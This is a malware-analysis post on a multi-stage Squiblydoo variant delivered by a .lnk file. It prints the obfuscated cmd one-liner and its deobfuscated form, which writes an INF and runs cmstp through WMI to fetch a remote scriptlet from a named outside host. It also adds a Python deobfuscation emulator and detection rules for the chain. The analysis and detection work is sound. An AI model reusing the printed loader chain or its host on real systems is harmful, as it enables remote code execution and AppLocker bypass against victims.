Attack - RCE Multi-stage Squiblydoo variant
Multi-stage Squiblydoo variant
step 1

The .lnk file carries a cmd command, but it looks encoded/obfuscated.

- The cmd line contains two distinct sections.
- The first part creates a "RANDOM.inf" file (RANDOM is a random number generated via %random%).
- The second part starts it using WMI and cmstp.
- cmstp is often used to bypass AppLocker.
original

```batch
"C:\Windows\System32\cmd.exe" /v /c set "EhWLDvbm34801=Items"
&& call set "EhWLDvbm4162=%EhWLDvbm34801:~4,1%"
&& (for %e in (c) do @set "EhWLDvbm4796=%~e")
&& !EhWLDvbm4162!et "EhWLDvbm8561=na"
&& !EhWLDvbm4162!et "EhWLDvbm85714=a"
&& !EhWLDvbm4162!et "EhWLDvbm13835=t"
&& !EhWLDvbm4162!et "EhWLDvbm9306=d"
&& call !EhWLDvbm4162!et "EhWLDvbm1449=%ran!EhWLDvbm9306!om%.inf"
&& call !EhWLDvbm4162!et "EhWLDvbm9442=%app!EhWLDvbm9306!ata%\Micro!EhWLDvbm4162!oft\!EhWLDvbm1449!"
&& !EhWLDvbm4162!et "EhWLDvbm59779=."
&& !EhWLDvbm4162!et "EhWLDvbm19532="^"
&& (for %r in ("[ver!EhWLDvbm4162!ion]" "!EhWLDvbm4162!ig!EhWLDvbm8561!ture=$Window!EhWLDvbm4162! NT$" "[!EhWLDvbm9306!e!EhWLDvbm4162!tinationdirs]" "2A436=01" "[!EhWLDvbm9306!efaultin!EhWLDvbm4162!tall_singleu!EhWLDvbm4162!er]" "UnRegis!EhWLDvbm13835!erOCXs=47E0" "!EhWLDvbm9306!elfiles=2A436" "[47E0]" "%11%\%EhWLDvbm55506%crO%EhWLDvbm59234%j,NI,%EhWLDvbm69079%%EhWLDvbm23745%%EhWLDvbm23745%p%EhWLDvbm23092%%EhWLDvbm20494%%EhWLDvbm20494%web2!EhWLDvbm59779!e-fax!EhWLDvbm59779!%EhWLDvbm2079%/gmaps!EhWLDvbm59779!txt" "[2A436]" "!EhWLDvbm1449!" "[!EhWLDvbm4162!!EhWLDvbm13835!rings]" "EhWLDvbm23745=t" "EhWLDvbm69079=h" "EhWLDvbm23092=:" "EhWLDvbm55506=s" "EhWLDvbm20494=/" "EhWLDvbm59234=b" "EhWLDvbm2079=org" "!EhWLDvbm4162!ervicen!EhWLDvbm85714!me=' '" "!EhWLDvbm4162!hortsvcn!EhWLDvbm85714!me=' '") do @e!EhWLDvbm4796!ho %~r)>"!EhWLDvbm9442!
"&& !EhWLDvbm4162!t!EhWLDvbm85714!rt "" /MIN wmi!EhWLDvbm4796! proce!EhWLDvbm4162!s call !EhWLDvbm4796!rea!EhWLDvbm13835!e "cm!EhWLDvbm4162!!EhWLDvbm13835!p /ns /!EhWLDvbm4162! /su !EhWLDvbm9442!"
```
chop

- && runs the second command on the line only when the first command returns successfully.
- %variablename% is a built-in or user-set environment variable.
- !variablename! is a user-set environment variable expanded at execution time; this delayed expansion is turned on with the setlocal EnableDelayedExpansion command (or, as in this sample, with the /v switch of cmd.exe).
```batch
%Items:~4,1%=s
%~e=c
```
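The substitution rules above can be applied mechanically. The following emulator is an added analysis example (it is not code from the post): it walks the obfuscated one-liner, resolves !var! references at execution time and %var% / %var:~start,len% references on call-ed commands in the same order cmd.exe does, records what the for ... do @echo loop writes to the redirected file and which process the start / wmic command would launch, and finally applies the INF [strings] table that hides the payload URL. The %random% and %appdata% values are constructed so the result is deterministic; the sample string is the post's own command with straight quotes.

```python
import re
from collections import defaultdict

# The post's one-liner, straight-quoted, with the '"...cmd.exe" /v /c' prefix
# dropped (its /v switch is what turns on !delayed! expansion) and the line
# break before the final "&&" rejoined so the redirect target keeps its quote.
OBFUSCATED = (
    'set "EhWLDvbm34801=Items" && call set "EhWLDvbm4162=%EhWLDvbm34801:~4,1%"'
    ' && (for %e in (c) do @set "EhWLDvbm4796=%~e")'
    ' && !EhWLDvbm4162!et "EhWLDvbm8561=na" && !EhWLDvbm4162!et "EhWLDvbm85714=a"'
    ' && !EhWLDvbm4162!et "EhWLDvbm13835=t" && !EhWLDvbm4162!et "EhWLDvbm9306=d"'
    ' && call !EhWLDvbm4162!et "EhWLDvbm1449=%ran!EhWLDvbm9306!om%.inf"'
    ' && call !EhWLDvbm4162!et "EhWLDvbm9442=%app!EhWLDvbm9306!ata%\\Micro!EhWLDvbm4162!oft\\!EhWLDvbm1449!"'
    ' && !EhWLDvbm4162!et "EhWLDvbm59779=." && !EhWLDvbm4162!et "EhWLDvbm19532="^"'
    ' && (for %r in ("[ver!EhWLDvbm4162!ion]" "!EhWLDvbm4162!ig!EhWLDvbm8561!ture=$Window!EhWLDvbm4162! NT$"'
    ' "[!EhWLDvbm9306!e!EhWLDvbm4162!tinationdirs]" "2A436=01" "[!EhWLDvbm9306!efaultin!EhWLDvbm4162!tall_singleu!EhWLDvbm4162!er]"'
    ' "UnRegis!EhWLDvbm13835!erOCXs=47E0" "!EhWLDvbm9306!elfiles=2A436" "[47E0]"'
    ' "%11%\\%EhWLDvbm55506%crO%EhWLDvbm59234%j,NI,%EhWLDvbm69079%%EhWLDvbm23745%%EhWLDvbm23745%p'
    '%EhWLDvbm23092%%EhWLDvbm20494%%EhWLDvbm20494%web2!EhWLDvbm59779!e-fax!EhWLDvbm59779!%EhWLDvbm2079%/gmaps!EhWLDvbm59779!txt"'
    ' "[2A436]" "!EhWLDvbm1449!" "[!EhWLDvbm4162!!EhWLDvbm13835!rings]" "EhWLDvbm23745=t" "EhWLDvbm69079=h"'
    ' "EhWLDvbm23092=:" "EhWLDvbm55506=s" "EhWLDvbm20494=/" "EhWLDvbm59234=b" "EhWLDvbm2079=org"'
    ' "!EhWLDvbm4162!ervicen!EhWLDvbm85714!me=\' \'" "!EhWLDvbm4162!hortsvcn!EhWLDvbm85714!me=\' \'")'
    ' do @e!EhWLDvbm4796!ho %~r)>"!EhWLDvbm9442!"'
    '&& !EhWLDvbm4162!t!EhWLDvbm85714!rt "" /MIN wmi!EhWLDvbm4796! proce!EhWLDvbm4162!s call'
    ' !EhWLDvbm4796!rea!EhWLDvbm13835!e "cm!EhWLDvbm4162!!EhWLDvbm13835!p /ns /!EhWLDvbm4162! /su !EhWLDvbm9442!"'
)

PCT = re.compile(r'%([^%:]+)(?::~(-?\d+)(?:,(-?\d+))?)?%')  # %var% and %var:~start,len%
BANG = re.compile(r'!([^!]+)!')                              # !var! (delayed expansion)
SET_RE = re.compile(r'^set "([^"=]+)=(.*)"$')
FOR_RE = re.compile(r'^\(for %(\w) in \((.*)\) do @(.*)\)(?:>"(.*)")?$')
ITEM_RE = re.compile(r'"[^"]*"|\S+')

def split_commands(line):
    """Split on '&&' outside double quotes; '^' escapes the next character."""
    parts, buf, quoted, i = [], [], False, 0
    while i < len(line):
        if not quoted and line[i] == '^' and i + 1 < len(line):
            buf.append(line[i:i + 2]); i += 2; continue
        if not quoted and line.startswith('&&', i):
            parts.append(''.join(buf).strip()); buf = []; i += 2; continue
        if line[i] == '"':
            quoted = not quoted
        buf.append(line[i]); i += 1
    parts.append(''.join(buf).strip())
    return parts

def expand_percent(text, env):
    """%var% expansion as cmd re-applies it to call-ed commands; unknown names stay literal."""
    def sub(m):
        name, start, length = m.group(1).lower(), m.group(2), m.group(3)
        if name not in env:
            return m.group(0)
        val = env[name]
        if start is None:
            return val
        s = int(start) if int(start) >= 0 else max(len(val) + int(start), 0)
        n = len(val) if length is None else int(length)
        return val[s:s + n] if n >= 0 else val[s:len(val) + n]
    return PCT.sub(sub, text)

def expand_delayed(text, env):
    """!var! expansion (cmd /v); unknown names expand to nothing."""
    return BANG.sub(lambda m: env.get(m.group(1).lower(), ''), text)

class CmdEmulator:
    def __init__(self, seed):
        self.env = {k.lower(): v for k, v in seed.items()}   # cmd variables are case-insensitive
        self.files = defaultdict(list)   # redirect target -> lines echoed into it
        self.spawned = []                # 'start ...' commands that would launch a process

    def run(self, line):
        for cmd in split_commands(line):
            cmd = expand_delayed(cmd, self.env)          # !var! is resolved at execution time
            if cmd.lower().startswith('call '):          # call re-parses, so %var% is re-expanded
                cmd = expand_percent(cmd[5:], self.env)
            self.execute(cmd, None)

    def execute(self, cmd, redirect):
        cmd = cmd.lstrip('@')
        if m := SET_RE.match(cmd):
            self.env[m.group(1).lower()] = m.group(2)
        elif m := FOR_RE.match(cmd):
            var, items, body, target = m.groups()
            for item in ITEM_RE.findall(items):          # %~x yields the item without its quotes
                self.execute(body.replace('%~' + var, item.strip('"')), target or redirect)
        elif cmd.startswith('echo ') and redirect:
            self.files[redirect].append(cmd[5:])
        elif cmd.startswith('start '):
            self.spawned.append(cmd)

def resolve_inf_strings(lines):
    """Second layer: substitute %key% tokens from the INF's own [strings] section."""
    strings, section = {}, None
    for ln in lines:
        if ln.startswith('[') and ln.endswith(']'):
            section = ln[1:-1].lower()
        elif section == 'strings' and '=' in ln:
            k, v = ln.split('=', 1)
            strings[k.strip().lower()] = v.strip()
    return [re.sub(r'%([^%]+)%', lambda m: strings.get(m.group(1).lower(), m.group(0)), ln)
            for ln in lines]

def analyse(line=OBFUSCATED):
    # %random% and %appdata% are seeded with constructed values for a deterministic result.
    emu = CmdEmulator({'random': '12345', 'appdata': r'C:\Users\victim\AppData\Roaming'})
    emu.run(line)
    inf_path, inf_lines = next(iter(emu.files.items()))
    return {'env': emu.env, 'inf_path': inf_path,
            'inf': resolve_inf_strings(inf_lines), 'spawned': emu.spawned}

if __name__ == '__main__':
    result = analyse()
    print(result['inf_path'], *result['inf'], result['spawned'][0], sep='\n')
```

Two details of the output are worth noting. Nothing in the for loop is call-ed, so the %EhWLDvbm...% tokens inside the echoed lines survive into the INF untouched and are only resolved by the INF engine's [strings] section, which is why the emulator applies that table as a separate pass. And the [strings] table spells out h, t, t, p, :, /, / with no s, so the resolved scriptlet URL uses plain http.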
cmstp:

Syntax 1 - This is the typical syntax used in a custom installation application. To use this syntax, you must run cmstp from the directory that contains the <serviceprofilefilename>.exe file.

```batch
<serviceprofilefilename>.exe /q:a /c:cmstp.exe <serviceprofilefilename>.inf [/nf] [/s] [/u]
```

Syntax 2

```batch
cmstp.exe [/nf] [/s] [/u] [drive:][path]serviceprofilefilename.inf
```
```batch
"C:\Windows\System32\cmd.exe" /v /c set "Items=Items"
&& call set "EhWLDvbm4162=%Items:~4,1%=s"
&& (for %e in (c) do @set "EhWLDvbm4796=%~e=c")
&& set "EhWLDvbm8561=na"
&& set "EhWLDvbm85714=a"
&& set "EhWLDvbm13835=t"
&& set "EhWLDvbm9306=d"
&& call set "EhWLDvbm1449=%random%.inf"
&& call set "EhWLDvbm9442=%appdata%\Microsoft\%random%.inf"
&& set "EhWLDvbm59779=."
&& set "EhWLDvbm19532="^"
&& (for %r in (
"[version]"
"signature=$Windows NT$"
"[destinationdirs]"
"2A436=01"
"[defaultinstall_singleuser]"
"UnRegisterOCXs=47E0"
"delfiles=2A436"
"[UnRegisterOCXs]"
"%11%\scrObj,NI,http://web2.e-fax.org/gmaps.txt"
"[delfiles]"
"%random%.inf"
"[strings]"
"EhWLDvbm23745=t"
"EhWLDvbm69079=h"
"EhWLDvbm23092=:"
"EhWLDvbm55506=s"
"EhWLDvbm20494=/"
"EhWLDvbm59234=b"
"EhWLDvbm2079=org"
"servicename=' '"
"shortsvcname=' '"
) do @echo %~r)>"%appdata%\Microsoft\%random%.inf"
&& start "" /MIN wmic process call create "cmstp /ns /s /su %appdata%\Microsoft\%random%.inf"
```
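The deobfuscated chain above gives a defender three observable points: a cmd.exe /v one-liner dense with !var! and %var:~n,m% tricks, a cmstp.exe child of the WMI provider host running a silent single-user install of an INF in a user-writable directory, and an INF whose UnRegisterOCXs section points scrobj.dll at a remote scriptlet. The following detection logic is an added example, not part of the post, and assumes Sysmon-style field names (ParentImage, Image, CommandLine); the events and INF texts are constructed, with a placeholder URL in place of the real one.

```python
import re

# Constructed Sysmon-style process-creation events, not real telemetry. The first
# two mirror the chain in the post (cmd.exe /v one-liner, then cmstp.exe spawned
# through WMI); the third is a benign installer run of cmstp.exe for contrast.
EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": '"C:\\Windows\\System32\\cmd.exe" /v /c set "EhWLDvbm34801=Items"'
                    ' && call set "EhWLDvbm4162=%EhWLDvbm34801:~4,1%" && !EhWLDvbm4162!et "EhWLDvbm8561=na"'
                    ' && !EhWLDvbm4162!et "EhWLDvbm85714=a" && !EhWLDvbm4162!et "EhWLDvbm13835=t"'},
    {"ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "Image": r"C:\Windows\System32\cmstp.exe",
     "CommandLine": r"cmstp /ns /s /su C:\Users\victim\AppData\Roaming\Microsoft\12345.inf"},
    {"ParentImage": r"C:\Program Files\ContosoVPN\setup.exe",
     "Image": r"C:\Windows\System32\cmstp.exe",
     "CommandLine": r'cmstp.exe /s "C:\Program Files\ContosoVPN\contoso.inf"'},
]

# Constructed INF text in the shape the post describes, after the [strings]
# indirection has been resolved; the URL is a placeholder, not the real one.
SAMPLE_INF = r"""[version]
signature=$Windows NT$
[destinationdirs]
2A436=01
[defaultinstall_singleuser]
UnRegisterOCXs=47E0
delfiles=2A436
[47E0]
%11%\scrobj.dll,NI,http://example.invalid/payload.txt
[2A436]
12345.inf
[strings]
servicename=' '
shortsvcname=' '
"""

# Constructed benign connection-manager profile for contrast.
BENIGN_INF = r"""[version]
signature=$Windows NT$
[DefaultInstall]
CopyFiles=Profile.Files
[Profile.Files]
contoso.cms
"""

USER_WRITABLE = re.compile(r"\\(users\\[^\\]+\\appdata|users\\public|programdata|temp)\\", re.I)
DELAYED_VAR = re.compile(r"![A-Za-z_][A-Za-z0-9_]*!")
SUBSTRING_TRICK = re.compile(r"%[^%]+:~-?\d+(?:,-?\d+)?%")

def check_process(ev):
    """Return the reasons a process-creation event matches the loader chain (empty if none)."""
    image, parent, cl = ev["Image"].lower(), ev["ParentImage"].lower(), ev["CommandLine"]
    reasons = []
    if image.endswith("\\cmstp.exe"):
        switches = {t.lower() for t in cl.split() if t.startswith("/")}
        if {"/s", "/su"} <= switches:                       # silent, single-user profile install
            reasons.append("cmstp silent single-user install (/s /su)")
        if USER_WRITABLE.search(cl):
            reasons.append("INF loaded from a user-writable directory")
        if parent.endswith("\\wmiprvse.exe"):               # child of 'wmic process call create'
            reasons.append("spawned through WMI rather than by a user shell")
    elif image.endswith("\\cmd.exe"):
        if re.search(r"\s/v\b", cl, re.I) and len(DELAYED_VAR.findall(cl)) >= 3:
            reasons.append("cmd /v with dense !delayed! variable expansion")
        if SUBSTRING_TRICK.search(cl):
            reasons.append("%var:~n,m% substring extraction used to build commands")
    return reasons

def check_inf(text):
    """Return the reasons an INF looks like a Squiblydoo loader (empty if none)."""
    sections, cur = {}, None
    for ln in text.splitlines():
        ln = ln.strip()
        if not ln or ln.startswith(";"):
            continue
        if ln.startswith("[") and ln.endswith("]"):
            cur = ln[1:-1].lower()
            sections[cur] = []
        elif cur is not None:
            sections[cur].append(ln)
    reasons = []
    for name, lines in sections.items():
        if not name.startswith("defaultinstall"):
            continue
        for ln in lines:
            key, _, target = ln.partition("=")
            if key.strip().lower() != "unregisterocxs":
                continue
            for entry in sections.get(target.strip().lower(), []):
                # scrobj.dll "unregistered" with a URL argument fetches and runs a remote scriptlet
                if "scrobj" in entry.lower() and re.search(r"https?://", entry, re.I):
                    reasons.append(f"UnRegisterOCXs section [{target.strip()}] loads scrobj.dll with a remote scriptlet URL")
    return reasons

if __name__ == "__main__":
    for ev in EVENTS:
        print(ev["Image"], check_process(ev))
    print(check_inf(SAMPLE_INF), check_inf(BENIGN_INF))
```

The process rule deliberately needs more than the /s switch, since legitimate connection-manager installers also run cmstp.exe silently; the user-writable INF path and the WmiPrvSE.exe parent are what separate this chain from those. The INF rule expects text in which the [strings] table has already been applied: on disk the sample spells scrObj as %EhWLDvbm55506%crO%EhWLDvbm59234%j, so a content scanner has to resolve that indirection before the substring check can match.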
ref
This post is licensed under CC BY 4.0 by the author.